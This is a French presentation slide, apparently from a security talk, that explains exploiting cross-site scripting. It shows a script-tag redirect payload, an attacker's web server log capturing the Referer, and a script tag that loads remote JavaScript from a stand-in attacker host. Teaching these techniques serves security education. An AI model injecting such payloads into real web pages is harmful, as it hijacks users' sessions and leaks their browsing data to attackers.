Exploitation – 2

• Redirection automatique vers un autre site :

  • <script>document.location="http://www.hsc.fr/"</script>
  • Rend inutilisable la page générée
  • L'utilisateur ne comprend pas la manipulation
  • Recupération du Referer (page précédente) dans les journaux du serveur Web de l'attaquant:
  • 127.0.0.1 - - [14/May/2004:15:54:24 +0200] "GET / HTTP/1.1" 200 - "http://localhost.hsc.fr/app1/article.php?id=15" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040207 Firefox/0.8"

• Utilisation de scripts plus complexes, avec récupération du source sur le serveur de l'attaquant :

  • <script src="http://www.attaquant.com/a.js"></script>
  • Contraintes de longueur contournées